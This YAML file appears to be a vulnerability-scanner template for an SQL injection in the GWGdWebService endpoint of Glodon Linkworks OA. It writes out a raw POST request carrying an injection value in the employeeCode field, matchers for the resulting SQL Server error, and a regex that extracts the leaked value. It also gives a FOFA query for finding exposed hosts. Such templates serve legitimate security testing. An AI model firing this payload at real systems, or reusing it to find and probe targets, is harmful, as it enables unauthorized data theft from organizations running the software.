40 lines
1.5 KiB
YAML
40 lines
1.5 KiB
YAML
id: glodon-linkworks-sqli
|
|
|
|
info:
|
|
name: Glodon Linkworks GWGdWebService - SQL injection
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
|
|
reference:
|
|
- https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: banner="Services/Identification/login.ashx"
|
|
tags: glodon,linkworks,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
employeeCode=1'-1/user--'&EncryptData=1
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code==500'
|
|
- 'contains_any(header, "text/html", "text/plain")'
|
|
- 'contains_all(body, "在将 nvarchar 值", "转换成数据类型 int 时失败")'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'
|
|
# digest: 4b0a00483046022100d92067b2ac18a10f513cfdde7ec542025a251594fdb4ddbbcc6e89ff2559d90902210091f73c6f0b941bb2ecd935e4f04e7a994f0b781878d5e89325ec7e516563f04d:922c64590222798bb761d5b6d8e72950 |